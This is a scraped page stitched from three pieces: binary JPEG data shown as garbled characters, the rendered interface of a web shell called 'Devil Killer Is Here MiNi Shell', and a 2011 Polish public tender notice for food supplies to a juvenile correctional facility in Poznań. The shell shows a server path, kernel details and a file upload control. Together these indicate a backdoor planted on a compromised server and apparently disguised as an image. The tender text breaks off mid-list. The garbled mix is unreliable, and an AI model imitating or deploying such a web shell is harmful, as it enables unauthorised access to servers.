JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110420/120463-N-2011.html

<p class="kh_header"><b>Poznań: Przetarg nieograniczony na dostawę artykułów spożywczych z podziałem na pięć zadań.
Zadanie nr 1. Dostawa mięsa wieprzowego, Zadanie nr 2 Dostawa wędlin i podrobów wieprzowych, Zadanie nr 3. Dostawa wędlin drobiowych i produktów drobiowych, Zadanie nr 4.  Dostawa drobiu, Zadanie nr 5. Dostawa pieczywa.</b><br>
<b>Numer ogłoszenia: 120463 - 2011; data zamieszczenia: 20.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Poprawczy , ul. Wagrowska 9, 61-372 Poznań, woj. wielkopolskie, tel. 061 8773719 w. 205, faks 061 8773767.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poznan.zp.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę artykułów spożywczych z podziałem na pięć zadań.
Zadanie nr 1. Dostawa mięsa wieprzowego, Zadanie nr 2 Dostawa wędlin i podrobów wieprzowych, Zadanie nr 3. Dostawa wędlin drobiowych i produktów drobiowych, Zadanie nr 4.  Dostawa drobiu, Zadanie nr 5. Dostawa pieczywa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1. 
1.Karkówka wieprzowa b/k świeża  kl. I - CPV 15113000-3 340 kg,
2.Schab wieprzowy b/k świeży  kl. I - CPV 15113000-3 - 180 kg,
3. Żeberka wieprzowe świeże - CPV 15113000-3 - 180 kg
4. Mięso wieprzowe drobne świeże kl. II - CPV 15113000-3 1300 kg,
5. Golonka ekstra peklowana w siatce - CPV - 15113000-3 20 kg,
6. Słonina świeża bez skóry mielona	- CPV - 15113000-3 380 kg,


Zadanie nr 2.
1 Parówki cienkie  w osłonce naturalnej - CPV 15131130-5 170 kg
2. Kiełbasa śląska - CPV 15131130-5 - 20 kg
3. Kiełbasa biała parzona CPV- 15131130- 5- 20 kg
4. Parówka gruba (flak naturalny)- CPV- 15131130-5 115 kg,
5. Kiełbasa zwyczajna - CPV - 15131130-5 350 kg, 
6. Kiełbasa żywiecka - CPV15131130-5 - 100 kg
7. Kiełbasa szynkowa CPV- 15131130-5 - 60 kg,
8. Szynka gotowana - CPV - 15131410-2 - 100 kg
9. Szynka wieprzowa mielona blok - CPV - 15131130-5 - 195 kg,
10.Szynka konserwowa - blok -CPV 15131130-5 90 kg
11. Pieczeń rzymska CPV -15131130-5 - 100 kg,
12. Wątrobianka - CPV - 15131310-1 - 115 kg,
13. Baleron - CPV - 15131130-5 - 80 kg,
14. Kaszanka blok - CPV 15131134-3 - 160 kg,
15. Mortadela z papryką - CPV- 15131130-5 - 90 kg
16. Polędwica sopocka - CPV - 15131130-5 - 50 kg
17. Metka łososiowa - CPV - 15131130-5 - 50 kg
18. Łopatka konserwowa blok - CPV - 15131130-5 - 60 kg
19. Szynka chlebowa - CPV - 15131130-5 -  100 kg
20. Rolada boczkowa - CPV - 15131130-5 - 100 kg
21. Salami  szerokie - CPV - 15131230-6 - 60 kg
22.Salceson czarny - CPV- 15131130-5 - 30 kg 
23.Golonka prasowana  blok CPV -15131130-5 50 kg
24.Kiełbasa słoikowa  -CPV - 15131130-5 40 kg
25.Boczek wędzony -CPV 15131130-5 - 30 kg,

Zadanie nr 3.
1. Szynka drobiowa - CPV - 15131135-0 - 110 kg,
2. Mozaika drobiowa - CPV - 15131135-0 - 60 kg, 
3. Szynka drobiowa z koperkiem - CPV - 15131135-0 - 70 kg,
4. Indyk faszerowany - CPV - 15131135- 0 - 110 kg,
5. Pierś z indyka pieczona - CPV 15131135-0- 85 kg
6. Pasztet drobiowy  konserwa łatwootwieralna 100g-140g - CPV 15131310-1 - 135 kg
7. Pasztet zapiekany z indyka	- CPV 15131135-0 -  110 kg
8. Galantyna  drobiowa -CPV 15131135-0 50 kg

Zadanie nr 4.
1. Filet z kurczaka -CPV 15112000-6 - 200 kg
2. Wątroba drobiowa - CPV 15112300-9 - 150 kg
3. Kurczak - CPV 15112000-6 - 1000 kg 

Zadanie nr 5.
1. Bułka pszenna zwykła CPV 15811400-0 - 30 kg
2. Bułka mleczna - CPV - 15811400-0 - 50 kg
3. Rogal maślany - CPV -  15811200- 8 - 80 kg
4. Bułka tarta - CPV 15800000-6 - 100 kg
5. Bułka graham - CPV - 15811100-7 - 200 kg
6. Chleb mieszany krojony foliowany15811100-7- 11000 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.13.11.30-5, 15.13.13.10-1, 15.13.11.34-3, 15.13.12.30-6, 15.13.14.10-2, 15.13.11.35-0, 15.13.15.00-0, 15.11.20.00-6, 15.11.23.00-9, 15.81.14.00-0, 15.81.12.00-8, 15.80.00.00-6, 15.81.11.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. W celu wykazania braku podstaw do wykluczanie z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach o których mowa  w art. 22 ust. 1 pkt. 1 ustawy Prawo zamówień publicznych, Zamawiający żąda oświadczenia o spełnianiu tego warunku zgodnie ze wzorem oświadczenia o spełnianiu warunków udziału w postępowaniu stanowiącym załącznik nr 7 do niniejszej SIWZ. 

b.	Zamawiający dokona oceny spełniania tego warunku według formuły spełnia /nie spełnia na podstawie dokumentów i/lub oświadczeń złożonych wraz z ofertą, wymienionych w rozdz. VI SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Wykonawcy spełnią warunek ( w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia oceniane będzie ich łączne doświadczenie) w przypadku gdy zrealizowali należycie 
w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania co najmniej dwie dostawy, odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia (odpowiednio do części zamówienia, na którą składana będzie oferta).
	W celu potwierdzenia spełniania niniejszego warunku, Wykonawcy zobowiązani są przedłożyć wykaz realizowanych dostaw, sporządzony wg załącznika nr 9 do SIWZ.


b.  Zamawiający dokona oceny spełniania tego warunku według formuły spełnia /nie spełnia na podstawie dokumentów i/lub oświadczeń złożonych wraz z ofertą, wymienionych 
w rozdz. VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. W celu wykazania braku podstaw do wykluczenia z podstępowania o udzielenie zamówienia publicznego Wykonawcy w okolicznościach , o których mowa w art. 22 ust. 1 pkt. 3 ustawy Prawo zamówień publicznych Zamawiający żąda oświadczenia o spełnianiu tego warunku zgodnie ze wzorem oświadczenia o spełnianiu warunków udziału w postępowaniu stanowiącym załącznik nr 7 do niniejszej SIWZ ( w przypadku wspólnego ubiegania się o udzielnie zamówienia przez dwóch lub więcej Wykonawców ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
b. Zamawiający dokona oceny spełniania tego warunku według formuły spełnia /nie spełnia na podstawie dokumentów i oświadczeń złożonych wraz z ofertą, wymienionych w rozdz. VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. W celu wykazania braku podstaw do wykluczenia z podstępowania o udzielenie zamówienia publicznego Wykonawcy w okolicznościach , o których mowa w art. 22 ust. 1 pkt. 3 ustawy Prawo zamówień publicznych Zamawiający żąda oświadczenia o spełnianiu tego warunku zgodnie ze wzorem oświadczenia o spełnianiu warunków udziału w postępowaniu stanowiącym załącznik nr 7 do niniejszej SIWZ ( w przypadku wspólnego ubiegania się o udzielnie zamówienia przez dwóch lub więcej Wykonawców ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
b. Zamawiający dokona oceny spełniania tego warunku według formuły spełnia /nie spełnia na podstawie dokumentów i oświadczeń złożonych wraz z ofertą, wymienionych w rozdz. VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z podstępowania o udzielenie zamówienia publicznego Wykonawcy w okolicznościach , o których mowa w art. 22 ust. 1 pkt. 4 ustawy Prawo zamówień publicznych Zamawiający żąda oświadczenia 
o spełnianiu tego warunku zgodnie ze wzorem oświadczenia o spełnianiu warunków udziału w postępowaniu stanowiącym załącznik nr 7 do niniejszej SIWZ ( w przypadku wspólnego ubiegania się o udzielnie zamówienia przez dwóch lub więcej Wykonawców ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
b. Zamawiający dokona oceny spełniania tego warunku według formuły spełnia /nie spełnia na podstawie dokumentów i oświadczeń złożonych wraz z ofertą, wymienionych w rozdz. VI SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">zaświadczenie ( lub inny dokument ) właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej poświadczające, ze Wykonawca wdrożył i stosuje system nadzoru HACCP</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. a)	formularz ofertowy - załączniki nr 1
 b)	formularz cenowy - załączniki nr 2 lub załącznik nr 3 lub załącznik nr 4 lub załącznik nr 5 lub załącznik nr 6, w zależności od zadania, którego dotyczy oferta.
c)	oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 7.
d)	oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych załącznik nr 8 
e)	 jeżeli oferta zostaje podpisana przez pełnomocnika Wykonawcy, jest on zobowiązany do załączenia pełnomocnictwa udzielonego przez Wykonawcę
f )wykaz niezbędnych do wykonania zamówienia samochodów przystosowanych do transportu danego rodzaju żywności.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany obowiązującej stawki VAT. Zmiany do umowy winny być wprowadzone poprzez aneks do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.poznan.zp.gov.pl/zamowienia_publiczne.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Poprawczy
ul. Wagrowska 9
61-372 Poznań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2011 godzina 10:00, miejsce: Zakład Poprawczy
ul. Wagrowska 9
61-372 Poznań
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mięsa wieprzowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1. 
1.Karkówka wieprzowa b/k świeża  kl. I - CPV 15113000-3 340 kg,
2.Schab wieprzowy b/k świeży  kl. I - CPV 15113000-3 - 180 kg,
3. Żeberka wieprzowe świeże - CPV 15113000-3 - 180 kg
4. Mięso wieprzowe drobne świeże kl. II - CPV 15113000-3 1300 kg,
5. Golonka ekstra peklowana w siatce - CPV - 15113000-3 20 kg,
6. Słonina świeża bez skóry mielona	- CPV - 15113000-3 380 kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa wędlin wieprzowych i podrobów wieprzowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2.
1 Parówki cienkie  w osłonce naturalnej - CPV 15131130-5 170 kg
2. Kiełbasa śląska - CPV 15131130-5 - 20 kg
3. Kiełbasa biała parzona CPV- 15131130- 5- 20 kg
4. Parówka gruba (flak naturalny)- CPV- 15131130-5 115 kg,
5. Kiełbasa zwyczajna - CPV - 15131130-5 350 kg, 
6. Kiełbasa żywiecka - CPV15131130-5 - 100 kg
7. Kiełbasa szynkowa CPV- 15131130-5 - 60 kg,
8. Szynka gotowana - CPV - 15131410-2 - 100 kg
9. Szynka wieprzowa mielona blok - CPV - 15131130-5 - 195 kg,
10.Szynka konserwowa - blok -CPV 15131130-5 90 kg
11. Pieczeń rzymska CPV -15131130-5 - 100 kg,
12. Wątrobianka - CPV - 15131310-1 - 115 kg,
13. Baleron - CPV - 15131130-5 - 80 kg,
14. Kaszanka blok - CPV 15131134-3 - 160 kg,
15. Mortadela z papryką - CPV- 15131130-5 - 90 kg
16. Polędwica sopocka - CPV - 15131130-5 - 50 kg
17. Metka łososiowa - CPV - 15131130-5 - 50 kg
18. Łopatka konserwowa blok - CPV - 15131130-5 - 60 kg
19. Szynka chlebowa - CPV - 15131130-5 -  100 kg
20. Rolada boczkowa - CPV - 15131130-5 - 100 kg
21. Salami  szerokie - CPV - 15131230-6 - 60 kg
22.Salceson czarny - CPV- 15131130-5 - 30 kg 
23.Golonka prasowana  blok CPV -15131130-5 50 kg
24.Kiełbasa słoikowa  -CPV - 15131130-5 40 kg
25.Boczek wędzony -CPV 15131130-5 - 30 kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.12.30-6, 15.13.14.10-2, 15.13.13.10-1, 15.13.11.34-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa wędlin drobiowych i produktów drobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3.
1. Szynka drobiowa - CPV - 15131135-0 - 110 kg,
2. Mozaika drobiowa - CPV - 15131135-0 - 60 kg, 
3. Szynka drobiowa z koperkiem - CPV - 15131135-0 - 70 kg,
4. Indyk faszerowany - CPV - 15131135- 0 - 110 kg,
5. Pierś z indyka pieczona - CPV 15131135-0- 85 kg
6. Pasztet drobiowy  konserwa łatwootwieralna 100g-140g - CPV 15131310-1 - 135 kg
7. Pasztet zapiekany z indyka	- CPV 15131135-0 -  110 kg
8. Galantyna  drobiowa -CPV 15131135-0 50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0, 15.13.15.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa drobiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4.
1. Filet z kurczaka -CPV 15112000-6 - 200 kg
2. Wątroba drobiowa - CPV 15112300-9 - 150 kg
3. Kurczak - CPV 15112000-6 - 1000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.23.00-9.</p></li>
